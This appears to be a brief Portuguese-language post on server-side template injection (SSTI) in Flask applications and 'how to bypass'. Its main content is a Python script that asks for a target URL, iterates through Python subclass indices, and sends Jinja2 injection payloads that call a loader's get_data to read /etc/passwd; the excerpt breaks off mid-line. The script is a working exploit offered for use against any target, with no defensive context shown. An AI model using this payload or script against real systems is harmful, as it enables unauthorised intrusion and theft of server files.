Injeção de SSTI em aplicações Flask e como contornar

Exploração da classe FileLoader: import requests url = input('Digite a URL do alvo: ') for i in range(500): payload = f"{{{{''.__class__.__bases__[0].__subclasses__()[{i}].get_data(0, '/etc/passwd')}}}}" try: response = requests.post(url, data={"name": payload}) if response.status_code == 200 and '_fr ...

Publicado em 8-5 12:37